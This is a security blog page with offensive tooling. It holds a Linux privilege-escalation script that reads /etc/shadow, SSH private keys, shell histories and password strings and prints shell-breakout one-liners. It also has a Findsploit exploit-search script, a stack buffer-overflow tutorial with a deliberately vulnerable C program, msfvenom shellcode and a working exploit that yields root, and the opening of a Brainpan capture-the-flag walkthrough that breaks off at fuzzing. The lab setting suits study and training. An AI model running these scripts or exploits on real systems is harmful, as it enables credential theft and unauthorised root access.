Monday, December 23, 2013

Linux Privilege Escalation Script



#!/bin/sh
#
#      `7MN.   `7MF'       
# __,    MMN.    M         
#`7MM    M YMb   M  pd""b. 
#  MM    M  `MN. M (O)  `8b
#  MM    M   `MM.M      ,89
#  MM    M     YMM    ""Yb.
#.JMML..JML.    YM       88
#                  (O)  .M'
#                   bmmmd' 
#                  
echo "-[Linux Privilege Escalation Script by 1N3]=--"
echo "-[http://treadstonesecurity.blogspot.com]=--"
echo ""
echo "#>01 Whats the distribution type? What version?"
echo "#>02 What's the Kernel version? Is it 64-bit?"
echo "#>03 What can be learnt from the environmental variables?"
echo "#>04 Is there a printer?"
echo "#>05 What services are running? Which service has which user"
echo "#>06 Which service(s) are been running by root? Of these services, which are vulnerable - its worth a double check!"
echo "#>07 What applications are installed? What version are they? Are they currently running?"
echo "#>08 Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?"
echo "#>09 What jobs are scheduled?"
echo "#>10 Any plain text usernames and/or passwords?"
echo "#>11 What NIC(s) does the system have? Is it connected to another network?"
echo "#>12 What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?"
echo "#>13 Whats cached? IP and/or MAC addresses"
echo "#>14 Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?"
echo "#>15 What sensitive files can be found?"
echo "#>16 Anything interesting in the home directorie(s)? If its possible to access"
echo "#>17 Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords"
echo "#>18 What has the user being doing? Is there any password in plain text? What have they been edting?"
echo "#>19 What user information can be found?"
echo "#>20 Can private-key information be found?"
echo "#>21 Which configuration files can be written in /etc/? Able to reconfigure a service?"
echo "#>22 What can be found in /var/?"
echo "#>23 Any settings/files (hidden) on website? Any settings file with database information?"
echo "#>24 Is there anything in the log file(s) (Could help with Local File Includes!)"
echo "#>25 If commands are limited, you break out of the jail shell?"
echo "#>26 How are file-systems mounted?"
echo "#>27 Are there any unmounted file-systems?"
echo "#>28 Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here"
echo "#>29 SGID (chmod 2000) - run as the  group, not the user who started it."
echo "#>30 SUID (chmod 4000) - run as the  owner, not the user who started it."
echo "#>31 SGID or SUID"
echo "#>32 Where can written to and executed from? A few common places: /tmp, /var/tmp, /dev/shm"
echo "#>33 world-writeable folders"
echo "#>34 world-writeable & executable folders"
echo "#>35 Any problem files? Word-writeable, nobody files"
echo "#>36 world-writeable files"
echo "#>37 Noowner files"
echo "#>38 What development tools/languages are installed/supported?"
echo "#>39 How can files be uploaded?"
echo ""
echo ""
echo ""
echo "#>01 Whats the distribution type? What version?"
echo "#####################################################################"
cat /etc/issue
cat /etc/*-release
echo ""
echo "#>02 What's the Kernel version? Is it 64-bit?"
echo "#####################################################################"
cat /proc/version 
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
echo ""
echo "#>03 What can be learnt from the environmental variables?"
echo "#####################################################################"
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
echo ""
echo "#>04 Is there a printer?"
echo "#####################################################################"
lpstat -a
echo ""
echo "#>05 What services are running? Which service has which user"
echo "#####################################################################"
netstat -tulnpe
ps -ef
cat /etc/service
echo ""
echo "Listing all running processes..."
ps -auxxx
echo ""
echo "#>06 Which service(s) are been running by root? Of these services, which are vulnerable - its worth a double check!"
echo "#####################################################################"
ps aux | grep root
echo ""
echo "#>07 What applications are installed? What version are they? Are they currently running?"
echo "#####################################################################"
#ls -alh /usr/bin/
#ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/
echo ""
echo "#>08 Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?"
echo "#####################################################################"
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
echo ""
echo "#>09 What jobs are scheduled?"
echo "#####################################################################"
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
echo ""
echo "#>10 Any plain text usernames and/or passwords?"
echo "#####################################################################"
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla
echo ""
echo "#>11 What NIC(s) does the system have? Is it connected to another network?"
echo "#####################################################################"
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
echo ""
echo "#>12What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?"
echo "#####################################################################"
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
cat /etc/hosts
arp
ifconfig -a
iptables -L
hostname
dnsdomainname
echo ""
echo "What other users & hosts are communicating with the system?"
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
echo ""
echo "#>13 Whats cached? IP and/or MAC addresses"
echo "#####################################################################"
arp -e
route
/sbin/route -nee
echo ""
echo "#>14 Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?"
echo "#####################################################################"
id
who
w
last
cat /etc/passwd | cut -d:    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
echo ""
echo "#>15 What sensitive files can be found?"
echo "#####################################################################"
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
echo ""
echo "#>16 Anything interesting in the home directorie(s)? If its possible to access"
echo "#####################################################################"
ls -ahlR /root/
ls -ahlR /home/
echo ""
echo "#>17 Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords"
echo "#####################################################################"
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
egrep -i pass * -Rn /etc/
egrep -i pass * -Rn /var/www/
echo ""
echo "#>18 What has the user being doing? Is there any password in plain text? What have they been edting?"
echo "#####################################################################"
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
echo ""
echo "#>19 What user information can be found?"
echo "#####################################################################"
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
echo ""
echo "#>20 Can private-key information be found?"
echo "#####################################################################"
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
echo ""
echo "#>21 Which configuration files can be written in /etc/? Able to reconfigure a service?"
echo "#####################################################################"
find /etc -user $USER
echo ""
echo "#>22 What can be found in /var/?"
echo "#####################################################################"
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases
echo ""
echo "#>23 Any settings/files (hidden) on website? Any settings file with database information?"
echo "#####################################################################"
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/
echo ""
echo "#>24 Is there anything in the log file(s) (Could help with Local File Includes!)"
echo "# http://www.thegeekstuff.com/2011/08/linux-var-log-files/"
echo "#####################################################################"
#cat /etc/httpd/logs/access_log
#cat /etc/httpd/logs/access.log
#cat /etc/httpd/logs/error_log
#cat /etc/httpd/logs/error.log
#cat /var/log/apache2/access_log
#cat /var/log/apache2/access.log
#cat /var/log/apache2/error_log
#cat /var/log/apache2/error.log
#cat /var/log/apache/access_log
#cat /var/log/apache/access.log
#cat /var/log/auth.log
#cat /var/log/chttp.log
#cat /var/log/cups/error_log
#cat /var/log/dpkg.log
#cat /var/log/faillog
#cat /var/log/httpd/access_log
#cat /var/log/httpd/access.log
#cat /var/log/httpd/error_log
#cat /var/log/httpd/error.log
#cat /var/log/lastlog
#cat /var/log/lighttpd/access.log
#cat /var/log/lighttpd/error.log
#cat /var/log/lighttpd/lighttpd.access.log
#cat /var/log/lighttpd/lighttpd.error.log
#cat /var/log/messages
#cat /var/log/secure
#cat /var/log/syslog
#cat /var/log/wtmp
#cat /var/log/xferlog
#cat /var/log/yum.log
#cat /var/run/utmp
ls -alh /var/log/*
echo ""
echo "#>25 If commands are limited, you break out of the jail shell?"
echo "#####################################################################"
echo "python -c 'import pty;pty.spawn("/bin/bash")'"
echo "echo os.system('/bin/bash')"
echo "/bin/sh -i"
echo ""
echo "#>26 How are file-systems mounted?"
echo "#####################################################################"
mount
df -h
echo ""
echo "#>27 Are there any unmounted file-systems?"
echo "#####################################################################"
cat /etc/fstab
echo ""
#echo "#>28 Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here"
#find / -perm -1000 -type d 2>/dev/null   
#echo "#>29 SGID (chmod 2000) - run as the  group, not the user who started it."
#find / -perm -g=s -type f 2>/dev/null   
#echo "#>30 SUID (chmod 4000) - run as the  owner, not the user who started it."
#find / -perm -u=s -type f 2>/dev/null
#echo "#>31 SGID or UID"
#find / -perm -g=s -o -perm -u=s -type f -exec ls -l {} \; 2>/dev/null   
#for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f -exec ls -l {} \; 2>/dev/null; done
#find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
find / -type f -exec ls -l {} \; 2> /dev/null | egrep -i  "rwsr|rwxr-sr"
find / -perm +6000 -type f -exec ls -ld {} \;
#echo ""
echo "SUID OR GUID Writable files..."
echo "#####################################################################"
find / -o -group `id -g` -perm -g=w -perm -u=s \
 -o -perm -o=w -perm -u=s \
 -o -perm -o=w -perm -g=s \
 -ls 2>/dev/null 
find / -perm 02000 -o -perm -04000 2>/dev/null
echo ""
echo "#>32 Where can written to and executed from? A few common places: /tmp, /var/tmp, /dev/shm"
echo "#####################################################################"
mount -l find / -path “$HOME” -prune -o -path “/proc” -prune -o \( ! -type l \) \( -user `id -u` -perm -u=w  -o -group `id -g` -perm -g=w  -o -perm -o=w \) -ls 2>/dev/null
echo ""
echo "#>33 world-writeable folders"
echo "#####################################################################"
find / -perm -o+w -type d -exec ls -lh {} \; 2>/dev/null   
echo ""
echo "#>36 world-writeable files"
echo "#####################################################################"
find / -perm -o+w -type f -exec ls -lh {} \; 2> /dev/null
echo "#>37 Noowner files"
echo "#####################################################################"
find /dir -xdev \( -nouser -o -nogroup \) -print  
echo ""
echo "#>38 What development tools/languages are installed/supported?"
echo "#####################################################################"
which perl
which gcc
which g++
which python
which php
which cc
echo ""
echo "#>39 How can files be uploaded?"
echo "#####################################################################"
which wget
which nc
which netcat
which scp
which ftp
which tftp
echo ""
echo "#####################################################################"
echo "#####################################################################"
echo "Done!"

Findsploit Script


#!/bin/bash
# Findsploit 20131223 by 1N3
#
#      `7MN.   `7MF'       
# __,    MMN.    M         
#`7MM    M YMb   M  pd""b. 
#  MM    M  `MN. M (O)  `8b
#  MM    M   `MM.M      ,89
#  MM    M     YMM    ""Yb.
#.JMML..JML.    YM       88
#                  (O)  .M'
#                   bmmmd' 
#                          
#
#
# ABOUT
# Finsploit is a simple bash script to quickly and easily search both local and online exploit databases. Currently searches Metasploit, Exploit-db, Google, CVE's, SecurityFocus, 1337day and OSVDB.

# REQUIREMENTS
# This script relies on exploitdb's searchsploit script and files in /pentest/exploits/exploitdb

# INSTALLATION
# 1. Copy the script to /usr/bin
# 2. Run chmod +rx /usr/bin/findsploit
# 3. To run, type findsploit <name of product> <version> <local/remote>

clear

VAR1=$1;
VAR2=$2;
VAR3=$3;

if [ -z "$1" ];
then
        echo "(--==== findsploit by nonXero ====---)"
        echo "(--==== Usage: findsploit windows xp remote, etc. ====--)"
        echo "(--==== http://treadstonesecurity.blogspot.com ====--)"
        exit;
else
        echo "(--==== findsploit by nonXero ====---)"
        echo "(--==== http://treadstonesecurity.blogspot.com ====--)"
        echo ""
        echo "(--==== METASPLOIT EXPLOITS"
        echo ""
        egrep -i "$VAR1" /opt/metasploit/apps/pro/msf3/modules/exploits/* -R | grep "Name"
        echo ""
        echo "(--==== EXPLOITDB EXPLOITS"
        echo ""
        /pentest/exploits/exploitdb/searchsploit $VAR1 $VAR2 $VAR3
        echo ""
        echo "(--==== Press any key to search online or Ctrl+C to exit..."
        read test
        firefox 'http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description='$VAR1'&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=' 2>/dev/null
        firefox 'https://www.google.ca/search?q='$VAR1'+'$VAR2'+'$VAR3'+exploit' 2>/dev/null
        firefox 'http://www.cvedetails.com/product-search.php?vendor_id=0&search='$VAR1'' 2> /dev/null
        firefox 'https://www.google.ca/search?q='$VAR1'+'$VAR2'+'$VAR3'+exploit+site:www.securityfocus.com' 2> /dev/null
        firefox 'https://www.google.ca/search?q='$VAR1'+'$VAR2'+'$VAR3'+site:www.1337day.com' 2> /dev/null
        firefox 'http://www.osvdb.org/search?search[vuln_title]='$VAR1'&search[text_type]=titles' 2> /dev/null
fi

exit

Friday, November 29, 2013

Linux Buffer Overflow Tutorial

LINUX BUFFER OVERFLOW TUTORIAL BY 1N3

                          

      `7MN.   `7MF'       
 __,    MMN.    M         
`7MM    M YMb   M  pd""b. 
  MM    M  `MN. M (O)  `8b
  MM    M   `MM.M      ,89
  MM    M     YMM    ""Yb.
.JMML..JML.    YM       88
                  (O)  .M'
                   bmmmd' 
                          

# OVERVIEW
This tutorial covers the basics of exploiting buffer overflows on Linux x86 platforms. Tested on BackTrack 5R3 Linux 3.2.6 i686 GNU/Linux.




# CREATE A VULNERABLE C APP THAT ACCEPTS USER INPUT WITH A TOTAL BUFFER OF 100 BYTES BUT NO BOUNDS CHECKING...

########################## test.c
#include <unistd.h>

int main(int argc, char *argv[])
{
    char buff[100];
    if(argc <2)
    {
        printf("Syntax: %s <input string>\n", argv[0]);
        exit (0);
    }
    strcpy(buff, argv[1]);
    return 1;
}

# COMPILING 
gcc test.c -fno-stack-protector -z execstack -o test.o

# DISABLE MEMORY RANDOMIZATION
echo 0 > /proc/sys/kernel/randomize_va_space

# DEBUG THE APPLICATION
gdb test.o

(gdb) disass main
Dump of assembler code for function main:
   0x08048454 <+0>:    push   %ebp
   0x08048455 <+1>:    mov    %esp,%ebp
   0x08048457 <+3>:    and    $0xfffffff0,%esp
   0x0804845a <+6>:    add    $0xffffff80,%esp
   0x0804845d <+9>:    cmpl   $0x1,0x8(%ebp)
   0x08048461 <+13>:    jg     0x8048484 <main+48>
   0x08048463 <+15>:    mov    0xc(%ebp),%eax
   0x08048466 <+18>:    mov    (%eax),%eax
   0x08048468 <+20>:    mov    %eax,0x4(%esp)
   0x0804846c <+24>:    movl   $0x8048570,(%esp)
   0x08048473 <+31>:    call   0x8048374 <printf@plt>
   0x08048478 <+36>:    movl   $0x0,(%esp)
   0x0804847f <+43>:    call   0x8048384 <exit@plt>
   0x08048484 <+48>:    mov    0xc(%ebp),%eax
   0x08048487 <+51>:    add    $0x4,%eax
   0x0804848a <+54>:    mov    (%eax),%eax
   0x0804848c <+56>:    mov    %eax,0x4(%esp)
   0x08048490 <+60>:    lea    0x1c(%esp),%eax
   0x08048494 <+64>:    mov    %eax,(%esp)
   0x08048497 <+67>:    call   0x8048364 <strcpy@plt>
   0x0804849c <+72>:    mov    $0x1,%eax
   0x080484a1 <+77>:    leave
   0x080484a2 <+78>:    ret   
End of assembler dump.

# SET BREAKPOINTS
(gdb) break *0x08048497
Breakpoint 1 at 0x8048497
(gdb) break *0x0804849c
Breakpoint 2 at 0x804849c
(gdb) break *0x080484a1
Breakpoint 3 at 0x80484a1

# FUZZ THE APPLICATION, OVERWRITE THE BUFFER AND CHECK IF ANY REGISTERS ARE OVERWRITTEN...
(gdb) r "`perl -e 'print "A"x120'`"
Starting program: /mnt/sdb/nonxero/scripts/fuzzers/test.o "`perl -e 'print "A"x120'`"
Breakpoint 1, 0x08048497 in main ()

# REGISTERS BEFORE USER INPUT
(gdb) info registers
eax            0xbffff72c    -1073744084
ecx            0x85b7641f    -2051578849
edx            0x2    2
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff710    0xbffff710
ebp            0xbffff798    0xbffff798
esi            0x0    0
edi            0x0    0
eip            0x8048497    0x8048497 <main+67>
eflags         0x200286    [ PF SF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb)

Breakpoint 2, 0x0804849c in main ()
(gdb) info registers
eax            0xbffff72c    -1073744084
ecx            0x0    0
edx            0x79    121
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff710    0xbffff710
ebp            0xbffff798    0xbffff798
esi            0x0    0
edi            0x0    0
eip            0x804849c    0x804849c <main+72>
eflags         0x200246    [ PF ZF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

# CHECK EAX REGISTER FOR A's (0x41)...
(gdb) x/16xb $eax
0xbffff72c:    0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbffff734:    0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41

Breakpoint 3, 0x080484a1 in main ()
(gdb) info registers
eax            0x1    1
ecx            0x0    0
edx            0x79    121
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff710    0xbffff710
ebp            0xbffff798    0xbffff798
esi            0x0    0
edi            0x0    0
eip            0x80484a1    0x80484a1 <main+77>
eflags         0x200246    [ PF ZF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

(gdb) step
Single stepping until exit from function main,
which has no line number information.
Warning:
Cannot insert breakpoint 0.
Error accessing memory address 0x41414141: Input/output error.

0x41414141 in ?? ()
(gdb)

# EBP AND EIP ARE OVERWRITTEN WITH A'S (0x41414141)
(gdb) info registers
eax            0x1    1
ecx            0x0    0
edx            0x79    121
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff7a0    0xbffff7a0
ebp            0x41414141    0x41414141
esi            0x0    0
edi            0x0    0
eip            0x41414141    0x41414141
eflags         0x200246    [ PF ZF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)


# Find which bytes overwrite EIP and EBP. change EBP to normal EBP before buffer and point EIP to beginning of EAX...

# EIP prior to user input
EIP 0xbffff72c

# EBP prior to user input
EBP  0xbffff798


# CREATE UNIQUE PATTERN TO FIND EIP/EBP OVERWRITE...
msf exploit(ms06_040_netapi) > ruby pattern_create.rb 120
[*] exec: ruby pattern_create.rb 120
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9



# FUZZ TEST.C WITH UNIQUE PATTERN TO FIND REGISTER OFFSET VALUES
(gdb) r "`perl -e 'print "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"'`"
Starting program: /mnt/sdb/nonxero/scripts/fuzzers/test.o "`perl -e 'print "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"'`"
Breakpoint 1, 0x08048497 in main ()

(gdb) info registers
eax            0xbffff72c    -1073744084
ecx            0x72698d95    1919520149
edx            0x2    2
ebx            0xb7fc5ff4    -1208197132
esp            0xbffff710    0xbffff710
ebp            0xbffff798    0xbffff798
esi            0x0    0
edi            0x0    0
eip            0x8048497    0x8048497 <main+67>
eflags         0x200286    [ PF SF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

Program received signal SIGSEGV, Segmentation fault.
0x64413764 in ?? ()
(gdb)


# FIND EIP OFFSET
msf exploit(ms06_040_netapi) > ruby pattern_offset.rb 64413764
[*] exec: ruby pattern_offset.rb 64413764
[*] Exact match at offset 112


# FIND EBP OFFSET
msf exploit(ms06_040_netapi) > ruby pattern_offset.rb 41366441
[*] exec: ruby pattern_offset.rb 41366441
[*] Exact match at offset 108


# CREATE SHELLCODE USING METASPLOIT TO RUN THE LINUX COMMAND 'whoami'...
msf exploit(ms06_040_netapi) > msfvenom -p linux/x86/exec CMD=whoami -b "x00" -e x86/shikata_ga_nai

[*] x86/shikata_ga_nai succeeded with size 69 (iteration=1)
buf =
"\xbf\x3c\x3f\x42\x4f\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9" +
"\xb1\x0b\x31\x78\x14\x83\xe8\xfc\x03\x78\x10\xde\xca\x28" +
"\x44\x46\xac\xff\x3c\x1e\xe3\x9c\x49\x39\x93\x4d\x39\xad" +
"\x64\xfa\x92\x4f\x0c\x94\x65\x6c\x9c\x80\x71\x72\x21\x51" +
"\x09\x1a\x4e\x30\x98\xb3\x90\xe5\x31\xca\x70\xc4\x36"

# EIP LITTLE ENDIAN
EIP 0xbffff72c
\x2c\xf7\xff\xbf

# EBP LITTLE ENDIAN
EBP  0xbffff798
\x98\xf7\xff\xbf


# CONSTRUCT BUFFER/EXPLOIT
total buff = 116
EIP = 4
EBP = 4
shellcode = 69
noops = 39


buffer = noops + shellcode + noops + ebp + eip
/================================================\
||116 *** 19 ****** 69 ******* 20 ***** 4 **** 4||
\================================================/

# RUN EXPLOIT...
(gdb) r "`perl -e 'print "\x90"x19, "\xbf\x3c\x3f\x42\x4f\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x0b\x31\x78\x14\x83\xe8\xfc\x03\x78\x10\xde\xca\x28\x44\x46\xac\xff\x3c\x1e\xe3\x9c\x49\x39\x93\x4d\x39\xad\x64\xfa\x92\x4f\x0c\x94\x65\x6c\x9c\x80\x71\x72\x21\x51\x09\x1a\x4e\x30\x98\xb3\x90\xe5\x31\xca\x70\xc4\x36", "\x90"x20, "\x98\xf7\xff\xbf", "\x2c\xf7\xff\xbf"'`"
Starting program: /mnt/sdb/nonxero/scripts/fuzzers/test.o "`perl -e 'print "\x90"x19, "\xbf\x3c\x3f\x42\x4f\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x0b\x31\x78\x14\x83\xe8\xfc\x03\x78\x10\xde\xca\x28\x44\x46\xac\xff\x3c\x1e\xe3\x9c\x49\x39\x93\x4d\x39\xad\x64\xfa\x92\x4f\x0c\x94\x65\x6c\x9c\x80\x71\x72\x21\x51\x09\x1a\x4e\x30\x98\xb3\x90\xe5\x31\xca\x70\xc4\x36", "\x90"x20, "\x98\xf7\xff\xbf", "\x2c\xf7\xff\xbf"'`"
process 16807 is executing new program: /bin/bash
process 16807 is executing new program: /usr/bin/whoami
root

Program exited normally.
(gdb)

Thursday, November 21, 2013

Brainpan Pentest VM Solution

BRAINPAN PENTEST VM SOLUTION BY 1N3

                          
      `7MN.   `7MF'       
 __,    MMN.    M         
`7MM    M YMb   M  pd""b. 
  MM    M  `MN. M (O)  `8b
  MM    M   `MM.M      ,89
  MM    M     YMM    ""Yb.
.JMML..JML.    YM       88
                  (O)  .M'
                   bmmmd' 
                          


# OVERVIEW
Brainpan is a test VM solution used for Pentesting/Hacking simulations. For more info, go to http://blog.techorganic.com/2013/03/brainpan-hacking-challenge.html. This walk through covers the basic steps to obtain "root" access to brainpan.

# DISCOVER HOSTS
netdiscover -r 192.168.1.0/24
_____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
192.168.1.132   00:0c:29:90:72:0d    01    060   VMware, Inc.                                                                                                      

# PORT SCAN
nmap -sV 192.168.1.132
Nmap scan report for 192.168.1.132
Host is up (0.00041s latency).
Not shown: 998 closed ports
PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port9999-TCP:V=6.25%I=7%D=11/6%Time=5279FCEC%P=i686-pc-linux-gnu%r(NULL
SF:,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x
SF:20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x2
SF:0\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20
SF:\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20
SF:_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x20
SF:_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x20
SF:THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20&gt;&gt;\x20");
MAC Address: 00:0C:29:90:72:0D (VMware)

# DIRBUSTER
#scan 192.168.1.132:10000 with dirbuster
dirbuster & 

# dirbuster shows a static index.html page, a static image file, a bin directory and a brainpan.exe within the brainpan directory.

# DOWNLOAD brainpan.exe
wget http://192.168.1.132/bin/brainpan.exe

# RUN brainpan.exe FROM WINE...
wine brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[!] bind failed: 10048[+] bind done on port 9999
[+] waiting for connections.

* FROM THIS, WE CAN DETERMINE THAT brainpan.exe IS RUNNING IN WINE FOR LINUX ON PORT 9999/TCP ON THE REMOTE HOST...

# DEBUGGING & FUZZING
